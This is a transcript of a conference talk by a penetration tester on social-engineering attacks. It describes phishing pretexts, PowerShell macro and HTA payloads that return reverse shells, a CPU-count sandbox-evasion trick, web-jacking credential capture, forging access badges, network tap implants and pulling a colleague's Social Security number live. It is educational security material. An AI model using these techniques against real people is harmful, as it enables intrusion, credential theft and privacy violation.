 So anyhow, I don't think this guy needs any more introduction, but Dave Kennedy was like the CISO for Fortune 100, left that to start his own business, and now has a really awesome team doing penetration testing and all sorts of other fun stuff, and he's going to talk about some end user attacks, so everyone welcome Dave Kennedy. Thanks, Chris. Appreciate everybody coming. This talk is always fun because they get to kind of go through a lot of the different war stories that we do and what works and what doesn't kind of out there. Just to brief history, I started Trust and Second Binary Defense. If you look on the right-hand side, I decided to be funny to hire a new employee, Justin, and telling that he had to kind of come into work and dress up to work the first day, and we all end up dressing up as different costumes, and I end up dressing up as like Batman or I was a Ghostbusters, that's right, and then one of the guys on the left decides to dress up as Pennywise as a clown, and I didn't know it until I was driving down the street to go to my office and look over to my right and he's right there, and this car is right next to me and he's just smiling like this, you know? It's one of those things that jacks you up and you never get over it, it's just, I don't know. But I'll go into some of this other stuff, but for me, when you look at where we're at today, if you look at a lot of the attacks that are happening out there, they really are originating from the human element or going after individuals. And it's funny because when Chris decided to start socialengineer.org, before he even started his own company and those other things, Chris and I were in a chat room in IRC, and this is kind of how the social engineer tool kit and everything else got kind of started, and Chris and I were good friends and that's a whole another story in itself, how we became friends, and actually the heat store, the heater story, he was mad at me and wouldn't even talk to me, and this was like a sign of offering, I was going to take him out to dinner and apologize for everything, that's when I had modified the seats to my car to burn his rear end. So that was like our peace offering and then I ended up burning his rear end. So we ended up becoming really good friends that way. Well, the funny part about Chris is he starts, he's like, oh my God, he starts hitting the X button to close out real quick and he closes his IRC chat room, right? And so he comes back in like 15 minutes later and he's like, I don't know who that was, but some real big idiot was on this website and he sent me this really bad website, dude, don't worry, we kicked him. Everything's fine, just go to this other website and it'll help you out. Right, got him a second time. And then we were at Schmoochon and you know, Chris wanted to beat me up and I'm like, Chris, listen man, I'm sorry, I didn't have kids this time, I'm like, hey man, I got kids and everything, I'm like, here's a picture of him and it was the same site and then I ran away, you know, so that's how Chris and I became good friends. But I homed in, I knew Chris was a special case and they needed to home in on him and treat him a little bit differently than others. But you know, what's interesting with all of that though, you know, Chris was in a chat room and he was like, hey man, I really think that social engineering and coupling technology is going to be a real big thing and this is like 2006. And I'm like, yeah, I agree with you, let's start like a little thing together and let's like figure out social-engineer.org and we can kind of get a group going and that's kind of how SET ended up becoming created and that's how we created the social engineer toolkit. And so it's interesting to see how all of these attacks have kind of evolved because if you look at the past year and a half, the majority of them come down to phishing, they come down to targeting individuals and human beings and it's really a successful endeavor and it's really, if you look at an attack, it's a really low, I don't think I can go that far over, it starts ringing. Attacks are a low investment, high impact of what you actually do. So you don't need someone that's heavily sophisticated or somebody that's really good at what they do as far as attacking. You have to be a zero-day researcher. You can get everybody the way that you want to right now and it's pretty easy to do. And I'm going to show you a demonstration and if you've seen this, I apologize. But it's a thing that I did on the Katie Kirk show and it's really resonant because literally I was going on the Katie Kirk show and Katie asked me, she's like, hey, can you just hack somebody live in the audience and then we'll videotape their reaction? You know, me being a hacker, I'm like, heck, yeah, I can. I'm going to steal all of her stuff and I'm going to do this. I'm going to grab her social security number and all of that. And I was all happy and excited about what I was doing but I didn't really realize the impact that it had on this individual. So I'm going to show you a quick demo of what I did on the Katie Kirk show. And just a heads up, so who are you going to see as Big Dave? I'm Little Dave. I've lost about 115 pounds since I last went on the Katie Kirk show about a year ago. So this is Little Dave. Thank you. It's amazing what eating less and working out can do for you. Turn it up. I caught him sleeping. Can you get up a little more? I understand that you believe your computer is unhackable. Why? She has two teenage daughters. She lives in Connecticut. And Stephanie, I understand that you believe your computer is unhackable. Why? Well, it's something that's really on my mind. I'm very concerned about it. I feel like all of my antivirus software is up to date. I've taken a lot of precautions. I have a computer consultant who comes into my home. So first of all, does anybody you know in your family have a computer consultant that comes in their house to make sure you have a couple? Wow, that's amazing because I never heard of one. I'm like, Katie picks the only person in the world that has a computer consultant that's going to lock her computer down. So I'm like, all right, I've got to start whipping out some zero days or something like that for this one. But we'll see. To check on these things. And so I really feel strongly that we have done everything that possible to try and protect myself and my daughters. I mean, it's something that's really worrisome for me. Well, that's very impressive because you seem like you're extremely ahead of the curve. So we decided to put David to the test to see if your comfort level with your security is actually warranted. Tell us what happened. How did you do when we gave you the challenge of? So right there, you know, so to kind of show how I feel at this point in time because I'm confident in what I'm doing. Actually, I got a little, little video. I can show you how I feel and I like a little animal meme. So this is a good one here. It's kind of how I felt at that point in time. That felt pretty good, right? To Stephanie's computer. So, you know, Stephanie, I would say it was actually one of the top 5% of what I would say is being most secure. You know, everything up to day, really locked down, all of those good things. And so I literally had plugged in, opened my computer up and less than 10 minutes or so had a fully designed website that looked real in every way and shape or form of a website that you would visit every single day. And I sent an email out and as soon as I sent the email, it looks very believable in every way. She clicked the link and then from there, again, less than 10 minutes of set of time and hacking and all that stuff. I had full access to her computer, her webcam, got around all of her antivirus, everything completely. You are kidding me. Wow. So, you know, as a hacker at this point in time, I'm like, I'm still doing, you know, I got everything, right? You know? And then I don't even think about what I'm doing. I'm just like, hey, I own everything you have here, you know? So, tell us, oh my gosh, that you were able to see. Well, the first thing we did is we enabled her. Why not enable her webcam? It's buying her house. We enabled her webcam. We were actually able to monitor everything that was going on in her house. Everything from her daughter working on her computer to Stephanie actually walking through the house itself. We actually enabled the audio as well. So we enabled our audio and turned to a tap device as well too so we can listen to conversations. It sounds all good. We hear everything that was going on at the same time. So we can listen to conversations. From there, you know, we started looking at a lot of... I won't let it keep going. It gets worse. But to say the least, you know, that was one of those moments where, like, you know, you realize, like, how impactful you are as an attacker and, like, the effect it can have on an individual. And, you know, the thing is, you know, for me to attack Stephanie, it took about 10 minutes of time. You know, literally, I went on her website. I checked, you know, her Facebook profile, her Twitter profile. Saw that she, at one point in time, like a year and a half ago, made a mention about an Amazon package delivery. So I just, you know, cloned Amazon's website. You know, I made a quick, you know, package distribution page and I sent her an email saying, hey, you know, Stephanie, just so you know, your package was rerouted due to a, you know, inclement weather changes or whatever. Please click here when you can schedule a new delivery. And as soon as she clicked, the link can compromise her computer, right? So it took about 10 minutes to set all of that up and hack her stuff. And it's something that is, you know, may seem stupid, but it works really well because I know that she shops on Amazon, right? So whenever you can establish some sort of trust with somebody, you have the ability to attack them in some way that is very personal that they expect. And that's what attacking humans are all about. It's about going after them in a way that you create a fantasy that's completely ridiculous, but it's believable to them. And what was interesting is so you'll see something that's coming out soon with CNN and it's not public yet, but I did a live hack on, you know, where I went after a company and the company gave me permission to do this. But I did, you know, I called the help desk up and I spoofed my phone number coming from inside of the company and I said, hey, just so you know, I'm having this weird problem getting to this website for this specific site itself. And they're like, oh, how can I help you because it's the help desk supposed to help, right? Like, can you just go to this website and make sure I'm not an idiot, you know, and that it's not my computer? And it's like, yeah, what's the website? And I just go, you know, www.whatever it was.com. As soon as they go to the website, it compromises the machine and I have full access to that help desk person's computer, right? But that's what they're designed to do. That's their function is to help. So if you can attack somebody in a way that is believable to them, that is understandable to them and it doesn't trigger any barriers or misconceptions around something that's wrong, then it works, right? And it works really, really well. The things that you run into is when you don't spend your time to research a company and go after them and you just do something that's like, hey, health benefits or hey, this or that, you actually got to spend some time looking at who you're going after on the target thing and I'll talk about that. And I got a cool example of one we just did recently which is really neat. So, you know, the premise of social engineering attacking humans is make something that's so believable to them that they're going to believe it and that it's not going to trigger any alarms, right? And really it just comes down to normal human behavior. If you're like, hey, I'm a Nigerian prince, you need to get $10 million if you click this link, no one's going to believe that, right? It's ridiculous, right? However, if I do my research on an individual and I know that they're in a big organization, perfect example, sales, right? Actually, you don't even need to do research on sales, right? You can do anything you want to the sales. Like, hey, I'm going to buy from you. I got like $5 million. Can you tell me what antivirus you have? Well, that's kind of weird, but yeah, I'm using Symantec. Oh, that's cool. Can you just type a couple commands and tell that to this? I'm still going to get the sale. Yeah, yeah, absolutely. Okay, cool. What am I doing here? Okay, yeah, okay, sweet. Hey, flag of virus. Oh, just right click and hit the save. Okay, cool, I'm still getting the sale, right? You know, it's interesting with people you target specifically, especially like sales. Like, if they're an organization that's business to business, like going out and talking to other businesses, creating a fake business that's in their demographics and their market is perfect. Like, create a fake website that looks like a business that they would sell to. And then you call them up and you're like, hey, bro, I got $15 million and I got my QN, my Q3Ns. I got to burn this $15 million in three days. Is there any way you can work with me? Yeah, absolutely. Everybody drops. You got the whole sale support staff. You're like, boom, fish him, fish him, fish him, show, show, show, show, show. You got the whole support staff just compromising everything, right? So you have to build your attacks off of a way that's going to be believable. I'll show you an example here in just a second of some things that we did. And for us, being a hacker is really about being and thinking outside of the world. When I first started in this industry, right, I started on that zero day route, just like building exploits and bypassing SLR and DEP and ROP and all this other stuff. And I still do some of that, but it's hard. Like building exploits nowadays, if you don't focus on it, it's really hard to do. For me, social engineering is that same type of excitement and fun because it requires you to put a puzzle together to figure things out in a way that you went before and come and figure out how you can attack somebody in a way that is unique. And it's literally like crafting your own zero day, right? It's like literally trying to get around ROP and putting a puzzle together because you have to put a puzzle of a human being together, which is way more complex. I mean, human beings act so crazily different depending on who you are or demographics or southern accents or British accents or females. You saw women have a much higher probability in social engineering and destroy based on culture. There's so many different things and variables that there's an industry to do that because that's exactly what the attackers are doing. And you know, what's interesting about pen testing, right? You hear a lot about pen testing and pen testing and pen testing. The thing about pen testing is that it doesn't really simulate an actual attack against an organization. It's like, hey, we're going to compromise this thing and then we're going to get domain and then we just owned everything and we're going to report on how we got domain and here you go, boom, right? It doesn't simulate an adversary, right? Forget about that one. Sorry, I forgot about that one. It's the only one in there that's bad. So we have to move more towards what we call objective pen testing to me and that's really trying to understand what the business does, how they operate and how can I attack them. For example, manufacturing companies. Does anybody here do work for manufacturing companies or work in a manufacturing type organization? Is the actual product they make, what's sensitive to them? No. But how they built that, the process of manufacturing, the compounds in there, the suppliers that they source it out to and the hundreds of years that they take to mature the specific product, that's the intellectual property and that's what they're going after right now. Same thing for, let's just say retail. Credit cards and customer information is number one, right? That's a given. We start going into other demographics like medical research or, you know, the Skate infrastructure and energy sectors and things like that, right? Every single organization is unique in their company, so requires us to actually attack them in a different way that makes it some way in shape or form, simulating what's actually going to happen out there. So I talked about this, but you know, if you look at what's kind of happening in the media right now, this is what's, I guess, the scariest thing to mean is that companies that have neglected security for ever, right? Now can claim that they were hacked by China and that it was sophisticated and all of the years of neglect, they now have been out, right? So we haven't funded security for 10 years. We haven't given it the right path and it hasn't been structured in our organization and some folks fished us with the most horrible fish ever and we fell for it and all we have is antivirus and our endpoints and that's it. And we get compromised, it was a sophisticated attack and we're not to blame for this. And that is a big issue for the security industry because it's not going to mature us and make us better. It's just another thing that we can blame and we can't actually look at most of the attacks that have happened. There are sophisticated attacks that happen out there, there's no question about it. You look at like the Sony stuff with North Korea, right? North Korea, that stuff that malware was pretty rudimentary. It dropped like six or seven different types of pieces of binaries on there. It looked like something out of like 1982. So if you can code like four lines of bash, you're now a sophisticated attacker in today's world. But it's everywhere. It's not Sony's default and it crucks forward in a way to blame other things that happen. And we didn't really see that with something like Target, right? Target, you know, they had the executives fired and everybody else out there because they lost all their credit card data. Even though they probably had a much better security program than almost anybody else out there at the time. So it's a different type of world we live in now because we can just blame things on attackers. You can blame things on someone being sophisticated and doesn't necessarily make a change. Now I'm going to show you some cool stuff too. But we went after a manufacturing company recently. It was what we call a red team engagement, right? So it's like no holds bar. You can do whatever you want to. When I say whatever you want to, it's not like you can like walk up and hold somebody up at gunpoint or anything, but it's like you can pretty much do anything you want to. Aside from like breaking stuff, probably not a good idea. But the main focus of this was the focus on their next generation product line or their R&D stuff, right? So what they're going to be doing in the future. And we had been doing work for this company for a long time protecting their IP and focused on protecting the research and development of their next-gen products. So it's really, really important to them to see if we can actually get access to it. And so we had any method that we could possibly use, right? We could do physical, we could do social engineering, we could hack anything we want to. We can do whatever we want to. It was a full scope, right? A lot of us would do any type of thing that we wanted to actually do. And so what we decided to do is, you know, hey, maybe we can go fishing first. But before we do fishing, maybe we can look at how we're going to help us out with it. Because in order to get to some of these people, we're going to have to get pretty deep. And so we started looking and we found a actual web application that had a file upload vulnerability in it which allowed us to compromise a website, okay? We compromised this website, but we didn't really have permission to do anything. It was like, you know, kind of locked in its own DMZ, didn't really, couldn't do any type of lateral movement or attacks or anything like that. So it was really difficult for us to attack the system. But what we could do is create our own web pages. And so we could create a web page on a company or organization's web page, right? Which does what? Trust and credibility, right? So establish this credibility and trust for a specific website because we have already owned the specific website. So what we ended up doing is we made this whole website and we sent it out to a couple of individuals in the sales department. And we ended up getting one of them like almost right away. So, you know, we had to log into this website, right? And we grabbed credentials. We didn't want to trigger anything yet, so we didn't like go for compromising a system because we didn't know what defenses they had in place. And so at this point in time, we had to figure out a way to actually go and attack them. And what we did is, you know, we, you know, fished them with this specific fish, long with username password and it was like a server they went through and did certain things. So it's great about Outlook Web Access. For some reason, corporations, they'll do two-factor VPN. You know, so if they do like a one-time pen or something for VPNs. But OWA for some reason is like always open. There's never any two-factor authentication, which is horrible because it has access to all of your, you know, email and exchange data and everything else that's going on. And so it was interesting with this is when we compromised the sales individual, somebody know what happens when you compromise an OWA infrastructure, like just a one user. Even more trust, right? Because you have conversations with people that have already been talking to you. So usually what I do when I compromise OWA is I'll sit there for like two or three hours just reading three emails. Just seeing which one is the perfect one for me to be able to send something back to them, right? And send something that's good for me, but not like what I did to Chris. But, you know, send something back to an individual sales person that establishes another part of trust and compromises the machine. And so, you know, what we had to look at is, you know, end up doing what was called an Excel injection. And I'll show you a quick demo of this really quick. Now, is anybody familiar? Has anybody used the tool Unicorn before? Couple people, it's great. If you haven't seen it, the new version 2 is out, which came out about two or three weeks ago. And it has a lot of new attack vectors in it, improved optimization of code. Metasploit, they got a much larger payload, so that whenever you generated payloads within Metasploit, it became much larger. And if you know anything about PowerShell injection, you have to keep it kind of small and compact and certain things. So I was able to strip out a large percentage of the new payload systems and so it's all in one. But if you're not familiar with PowerShell, so to put it in perspective, like every new operating system from Windows Vista and above has PowerShell installed on it. And PowerShell is a very specific type of attack vector because it allows you to basically do direct memory access and inject shell code directly into memory through PowerShell, which means that if you're using something like a Bit9 or application whitelisting, you can circumvent that really easily and just inject your own shell code there and never touch disk. And so I ended up creating Unicorn, which allows you to attack 32 and 64 bit platforms natively with it. And so one of the attack vectors that you can do now is through macro injection, which was like some individual added it to a get pull request, which is really cool and I've improved it since then. And what's nice about this, I just want to show you real quick. So any new hacker tool, by the way, has to have ASCII-R as far as I'm concerned, so this has an awesome... It was funny, I was teaching my black hat class and one of the students was like, it'd be awesome if the Unicorn had red eyes. So at break time I coded in red eyes, so it's all fun. But Unicorn what it does is it allows you to generate a number of attacks. And so one of the ones that we're going to run really quick is the macro attack. And so first we need a payload. So we're going to specify like Windows interpreter reverse TCP. And I'll just give it any type of IP address that I want to. And then I'm going to specify macro, port macro. And it's going to go ahead and generate the code for us. And I use this all effectively, especially if you have a trust relationship. And so I'll go ahead and edit this. And it generates macro code for you that does power shell injection natively. So when they open up the Excel document, it doesn't touch disk, it doesn't download anything else, it just injects shell code into memory for you. So it compromises the system and it gets around a lot of the application while it's in type technology. And by the way, if you're using what's called execution parameter, so it gets around any type of execution restriction policies that you have in place too. So if you're using all sign or remote sign or anything like that, it doesn't make a difference. And so that'll work. You execute that, it compromises the machine and then it gives you a shell out of the network, which I'll show you a demonstration here in just a few minutes. But it works extremely well. It's effective where I use a lot of the social engineering techniques. But what's interesting though is I ran into a specific virtualization technology and I'm not going to talk about which one it is because I don't necessarily like bashing vendors or anything like that. They all do what they can. But I ran into a virtualization technology. Does anybody know how those type of technologies work? A piece of malware comes in or something comes in and it doesn't look normal, right? They spin up in a virtual machine, right? And that virtual machine then looks at everything that's occurring. So it doesn't make changes to the operating system for persistence or other areas. It's a neat technology. So I ended up sending this Excel document to the sales individual and all of a sudden it didn't work and I couldn't figure out why. And I was looking at it and I could see the initial connection but then after that it just died and it wasn't coming from the actual computer. So I'm like, they're using some sort of virtualization technology. So I need to take a look at how to get around that. So if you want to look at some of the other elements but I'm releasing this today for you all so you can see how to get past sandbox technology in all of them which is great. And it's extremely difficult. So I'm going to show you all of the code right here. Just kidding it's not really hard. It's three lines of code to get around virtualization technology but it's actually really bad. It's terrible. So the virtual machines all use very predictable sandbox containers, right? And a lot of them, a lot of the big ones are less or usually just less than one. So does anybody you know use one CPU core at all in your environment? No, right? So if CPU core is less than two then just don't do anything and exit. So when it comes into these sandbox technologies, right? It's like, hey, hey, hey, are you doing anything? Oh, I'm in one CPU don't do anything. Oh, you're not doing anything. You're good. Pass it off to the end user. It's cool, right? And they're like, oh, it came through this virtualization technology environment. Okay, run the code and execute. Good, I got my shell. So yeah, it works for pretty much any major one. What's interesting and the reason why I talk about this, by the way, is it's now being baked into a lot of the malware that you see out there today. Like I know Dyer came out with it and now Dyer actually has it built into the malware itself so it actually looks for sandbox environments and does it. There's a whole bunch of different ways though to get around virtualization sandbox stuff. They've gotten a little bit smarter on that. The CPU core counts are extremely easy and it works almost every time. There's a few other ones too. So what was cool about that is we got past the virtualization technology and we compromised some boxes. And we bypassed the sandbox technology. We ended up looking at a lot of different areas that we can get in Excel injection and end up working for us with the PowerShell Injection which was awesome. So we got most specifically one that we were specifically targeting that we really liked. So what's interesting about this attack is they use proper network segmentation which is really interesting to see. Most of the attacks that you see out there today is due to one person becoming compromised or maybe a couple people becoming compromised. And then that whole thing you hear about lateral movement. So they compromise one machine and they spread out the rest of the network with information that you have in M&M syndrome. They're hard on the outside and soft on the inside. So once you get past that hard exterior and you go to the inside and you now have the ability to touch all the systems that you want. What was interesting about this company is that they actually did pretty decent network segmentation. So it was really hard for me to even touch any of the individuals that were part of R&D. I couldn't even get to the R&D people that I needed access to let alone get to the information that I needed to. So one thing I noticed is that when I was going through and attacking, one of the VLANs I was able to get access to had the physical security system on it. If you don't know much about physical security systems, the physical security manufacturers are so far behind the logical, I guess, folks that usually breaking into physical security systems are really easy. And usually physical security guys don't handle good security practices in a lot of cases. So we ended up getting into this as their physical security website for the company. And it listed how to make a badge. This is step one. So I go to this website, enter this username in, enter this password in, and I'm in this badging system. And it's like, next if you need to create a new employee, make sure you sign the rules that you need access to. So I created myself a badge, so David Kennedy gets a badge. And I'm like, oh, I need access to R&D. Oh, it has a pin? I'm going to select all of this. So I added all of this and everything. And it said, usually the badge will print and everything and be ready for the new employee to pick up usually within an hour or two, something like that. So I waited a day. And so I dressed up. You know, it's live footage. But I ended up dressing up. When you go to an organization, you want to play the part. You want to play who you're going to be going after. You don't want to arouse any suspicion. So this company specifically was more of like a tie type of company. So I had to wear a tie and everything. And I walk up to the front desk and the security guard is sitting there and everything. I'm like, hey, I'm a new employee. I have a badge. My name is Dave Kennedy. He's like, oh, here you go. Here you go, Dave. Here you go. Sweet. Thank you. So I badge and clip on. Exit in and I'm walking in the building. It's great. So so far so good. I'm at the point where I wanted to get in. And so I started walking around and kind of trying to find different areas and trying to see if I could find the R&D area. So I find the R&D thing. And companies try to promote what they're doing as far as research and development. So there's this R&D center of excellence and it's like tinted windows and security access and all that stuff. And so I get to this area here and I'm going to tie in everything and I get to this R&D center of cool. I'm going to go in here and I'm going to try to get into this environment, this network segment so I can hack the rest of the information I need to get access to. And so I walk in there and I don't know if you've ever been in a situation, like the clown situation where I walked into a bunch of clowns, right? Like you don't belong. Like I should not be in this room where there's a whole bunch of clowns, right? Same thing that happened in this one. I ended up badging at my pen and I walk in and they're all looking at me like, who are you and why are you here? So at this point you have two choices, right? You're like, well I can just back off and pretend nothing happened. Oh, I'm sorry, wrong room, wrong room. Or you're like, let's see what happens and walk in. So I'll walk in and I just kind of go to the side a little bit and everybody's kind of looking and they go back to doing what they're doing, just standard business or anything. I guess they figure if I have access to this on the individuals and ended up not seeing a trash can that's sitting there and I'm walking and I trip over this metal trash can, right? And there's like, you know, there's like mustard all over me and food and everything and I literally hit it hard. Like I mean I hit it and I'm like rolling and being 6 foot 4 and being like, you know, starting to get into my mid 30s, when you fall hard, you fall hard, right? And you're sore for like honey, I had a rough day at work saying she's like, I thought you're a computer guy. Why do you have bruises everywhere? I'm like, you have no idea what I've been through. No idea. But you know, what's funny is I made this huge noise in all this trash everywhere. People pick me up and everything, like oh my gosh, are you okay? I'm fine, I'm fine, I'm fine, I'm just going over here to try to get over here. Like, okay, I'm so sorry this happened. We'll move the trash can to our fault. I'm like, no, I'm going to get over to the side and I see a computer there and I'm going to be open sourcing this next week. And it's what I call it, it's what we call our tap devices which if you're familiar with like Intel Nooks, little Nooks, you can buy them for like 200 bucks or something like that. You go and you buy one of those and you get like 128 gigs out of state drive, give it about 8 gigs at RAM and then you can also buy an LTE card for if it's in. And so that will automatically establish a reverse SSH VPN and Jeff also one of our guys is also back there, right Jeff? Also wrote the SSH VPN part of it so I can't take all credit for that. But it basically establishes a reverse SSH connection out of the LTE network while bridging the other network that might be air gapped and then it does a reverse SSH connection and then you can VPN full tap device through an SSH connection into that environment to get around it. It's nice about the tap devices and what I built is it's kind of like self healing so if there's problems with the operating system or the connection it tries to repair itself so they can get back out again. So like something goes wrong and tries to fix itself and restore itself back to its original content. So I'll be releasing that. I've been working on it for actually about a year and a half and I figure why not just open source it. But that's kind of how that works. Now what's interesting with the implants themselves, you know when I open source the code is it will literally, we've never seen it fail in an environment that we get physical access to. So it can do things like impersonate the network that it's going on to automatically clone a MAC address so that you can get around a lot of the 802.1 exit. Also I'm working on right now a module for it where it'll actually sniff for printer MAC and one of those so that it gets into like the printer VLAN so you can at least get some access into an environment that may not have 802.1 X in place. So there's a lot more stuff that I'm adding to that which is really cool. I want to show you a quick demo here real quick. Then I'm going to ask is Chris still around? I got a demo for you. I want to check real quick here. Do I have your permission first? Can I get your permission Chris? I need your permission Chris. I'm first year you're wrong. Well wait a minute. I got a demo here to do first. I have to see if I can get to it but we'll try. So one of the attacks that I use a lot in social engineering is through the social engineering tool kit. And if you've used set, set is just a tool. It's just a tool that can help you in what you're doing. If you're just running set to run a tool then you're not going to be successful. However, if you actually are going to be successful in how you do it. One of the new attack factors that I added into the social engineering tool kit and special thanks to Justin Elsie for leading me on to this is what we call the HTA tax. If you're familiar with most corporations they still traditionally use Internet Explorer. It's kind of their main method for browsing. Compatibility, Oracle, everything else that comes along with the horribleness of Internet Explorer. So what you can do and this works in Chrome is you want to use this in IE is what we call HTA files. And HTA files are a separate launcher that gets added to Microsoft and it gets called. And it's kind of a similar problem that we saw with Java applets in the past. If you're not familiar with Java applets it's a way of basically compromising machine very easily if you have Java installed. It doesn't matter what version, doesn't need to be zero or anything like that. It just always works. But in this case I'll show you how easy this is. And this is version 652. I just came out recently. What's interesting about this version is I named it Mr. Robot. Have you ever seen this show Mr. Robot? Yeah. Good stuff, right? What was interesting is I was literally in bed sleeping. I had Mr. Robot recorded and I'm like in bed and I'm all snuggling and I got my comforter on and I'm just getting ready to fall asleep and all of a sudden my phone starts ringing and I guess the social engineer tool kit was on Mr. Robot. So I actually used Mr. Robot to hack into someone's computer system through one of the sms smoothing attacks which is kind of neat. So I actually got to see my tool used in a TV show on hacking into things. So I named my next version Mr. Robot in honor of an awesome TV show which is really sweet. But we're going to hit number one social engineering attacks. And then I'm going to hit number two HCA attack, number eight. And so this is a new attack factor that's in there right now. And then it's going to ask me for what my IP address is. So if I was actually doing this on the Internet I would give them my external IP address. And what port I want to payload. I'll use meterpreter, reverse TCP but you can use whatever you want to. Now we're doing this attack right? What I usually do is I'll use something like, everybody use RAR before. Great tool. And what it does is it sweeps a whole externally facing network looking for websites, right? And if you hit a customer's website and you look for those specific ports you can see the website that's out there. You can start to kind of get an idea of what maybe what type of pretext you're going to use for an attack. And so you can kind of sweep the network looking for a different website that may look somewhat believable that you might want to clone. And so I go after that company's website, clone 2. And I'll go ahead and just clone trust a sec as an example. And it's going to clone the website. It's going to automatically generate the PowerShell injection code. It's going to automatically wrap it out and create everything for you in a web application for the website. And then it's going to launch Metasploit for you for an actual listener. So it'll do all that for you automatically. And then we're ready to go for our attack. Well, next I would, you know, run a pentest in. Well, I got to update you out of the loops. This is my hack box anyway. I don't care. And, you know, the customer was like, man, this is never going to work, right? This isn't going to work. No one's going to believe this. He had more shells coming in that he couldn't even type in sessions to interact with the shells because too many shells were coming in at a time. I think he had like 94 at the end of the day from the specific one. So I really only recommend targeting like one or two people at a time. Just wait. Like send it to like one person and just chill. Grab a beer or a Diet Coke or water or whatever you're into. And just wait for that person to actually click on something before you compromise them. Because I mean, if you're targeting one person it's a much less probability chance of actually getting attacked or detected in that type of case. So wait for one person and kind of wait and wait and wait and then wait. So I'm going to go to this website and let's just say I sent a pretext out or whatever it ends up being. There's a million of them that you can come up with. Ha ha, get Windows 10. Nope. We'll go to this website. And you get prompted for a quick open, right? And so if you build this in your pretext it's great. When you go to a website you may say, hey, when you get to the website you need to open the content to validate who you are as an organization or whatever. And this warning better is great from a trust perspective because it's saying it's signed by Microsoft, right? The author is Microsoft publisher and it's wanting you to open up this application. Would you trust this? If it's signed by Microsoft it probably would. Most people would, right? Now as soon as you hit allow, oops. Over here. Give it a sec. Power shell injection takes a second. And there we go. We get our shell. So it's a very effective attack. You can use it pretty much on any building windows. If you're going after a company that's using more Linux or OSX I move more towards credential harvesting type attack to get more from them because it's a little bit harder to pop them. Most companies don't install Java for OSX by default. Java is uninstalled by OSX which is great. So in a lot of cases if you're targeting Windows specific platforms the HTA files are the way to go now. Java exploitation is really good as well. One thing I'll say really fast is I'll couple this attack with what we call Web Jacking. Anybody used the Web Jacking method before? This is the worst one ever. In a good way for us but bad for people. So let me show you the Web Jacking method really fast. So what I'll usually do is I'll send an e-mail out, right? And I'll try to remove all barriers I possibly can. I'm just going to the Web Jacking vector. I'm going to hit number two and I'm going to call it as an example just because it has a username and password field on it. Now the messed up part with Web Jacking is this. I didn't close that outright. That's why I crashed. So what I'll usually do is I'll create a website that looks similar to the company. Letter of heads and everything has a nice website type design. And I'll do a pretext of whatever I want. So maybe it's a company survey or something like that. It's company.trustitsec.com a valid domain that is owned by that company. Yeah, right? So if I'm going to survey.trustitsec.com that's legit, right? So if I make a website that says make sure when you hover over this link it's SSL and then it's going to survey.trustitsec.com and when you hover over the link it's legitimate for anti-fishing purposes. So if I hover over this link and make this website look good and the address bar says https.com. So that's a legit address. So if I click that link in my browser if I'm using Firefox I don't know if anybody uses this operator anymore. Chrome or IE should my browser go to accounts.google.com? Yes, right? So watch what happens when I click this link. This is one of the messed up ones because it takes advantage of what we call the hover. We hover over the link to make sure the link is legitimate before you click the link. This defeats that unfortunately. So what you can actually see here is when I click on this it's actually going to go to accounts.google.com. The website is actually going to be there for a couple of seconds and then it's going to do a fast switcheroo really quick and then we're going to be at our malicious website where we can capture using a password or whatever it is on the bottom left-hand side accounts.google.com, right? So if I click it, no hands I'm at accounts.google.com, right? Oh, quicks are true. Notice the URL bar on the top, switched really fast. I'm actually at my malicious website which is 192.168.17.161 and this is my user now my password goes in redirects back to the legitimate sites so they never knew that as a bad place in the first place and then over here in my account. So very effective attack that you can couple with other ones, right? So you can use that in conjunction with the Java Apple attack or an HTA attack or whatever else but what's interesting is when I do most social engineers I don't ever use an exploit. I don't use an exploit anymore. There's no reason for me to use an exploit. They may get picked up by something like an Emmett or a next-gen type thing. Just use how operating systems are designed to suck. You use Java how it's designed to be horrible, right? You just use those types of techniques that you can use because people are going to believe whatever you do when you actually go and do it. So this one for me is probably one of the most effective ones that I've had a good success read on. I'm going to show you another one here. I'm going to take my screen up just for a second just to make sure I can get to it real quick. If I can't then I apologize but one second here is good. So Chris, do I have your permission? What's that? Well, it's just a good site. Ah, come on. All right, Chris, I promise you I'm going to have you come up on stage here, okay? But hang on. I'm going to pull your date of birth, your home address, your social security number, and a bunch of other stuff, your full social. But I'm not going to put it on the screen. I'm not going to put it on the screen. I'm going to have you come and confirm it. All right? What did I do last year? Oh, no, I'm not going to put it on the screen. That's where I got it. It's off the screen. All right, hang on. Did someone do it to you? Okay, hang on a second. All right, how long has it taken me? I had to log into my VPN really quick to get access to the database, but hang on a second. Hang on, is your beginning of your home phone start at 570? I didn't know you were that old. Really? This can't be right. This can't be right. Is it your full social? Yeah. Okay. I didn't know you were that old. Congratulations. You look great. You look great. You look great. I'm proud of that. I got rid of it. It's done. There's no remnants of that. It's gone. Don't worry. If I wanted, I had it, obviously. So if you don't know this, there are ways to get people's personal information and do a lot of reconnaissance on them. One of the things I like to do if I'm targeting individuals, I'll pull specific personal information about them, like challenge questions or things they may be used for security questions or things like that. One of the big ones is social security numbers. Social security numbers are extremely easy to get if you know how to get them. I just pulled Chris's full social. It wasn't his last four. It would have been bad. I thought it would have been funny. He didn't even find it funny. So I actually did something recently where I was on a phone with somebody and I was trying to get some information from them. What I used to get rid of that trust factor is I said I just want to confirm your last four. I'm going to prove to you that I know who you are and that this is part of it. Your last four is this. Your home address is this. Here's your personal number here. I need this and this and this and this and this. Here you go, here you go, here you go, here you go. Any way you can alleviate any type of trust factor when you're going after somebody is very beneficial and very effective when you actually go on target. Just as an example, last week one of our guys, Paul, was doing a physical. He went to this big company. They have multiple headquarters or multiple campuses and everything. He had his phone out and he's looking lost and everything and he sees an employee with the badge. He goes to this employee and he says hey, I'm lost. How do I get to the main building because I'm here for a job interview? The employee was extremely helpful as I would be too. The employee didn't do anything wrong at all. Just was trying to help somebody that was trying to get to a main campus. Just normal conversation. Doesn't trigger anything. So as soon as he did that, we went to Kinko's. We made fake badges and we walked right into the building. You don't need to do a proxmark to clone a badge. You just walk behind somebody. If you have a badge, you look good. You walk in and plug into the network and you hack away. It all comes down to making sure you have a confidence level and that you alleviate anything that might happen with trust. I guess that's really the big goal for social engineers. If you're looking at getting the biggest thing I can give you as far as tips and I'm not the greatest social engineer, I mean Chris could run circles around me and I'm actually giving you a compliment, Chris. I cannot code you. But the biggest thing I can give you is that one, you have to have confidence when you're doing your calls or you're in person because humans can sense when you're nervous. If I'm on the phone and my name is okay, you're right back. You know, they're going to make why that dude was really weird and something's not right there, right? That's how Chris sounds, I'm just 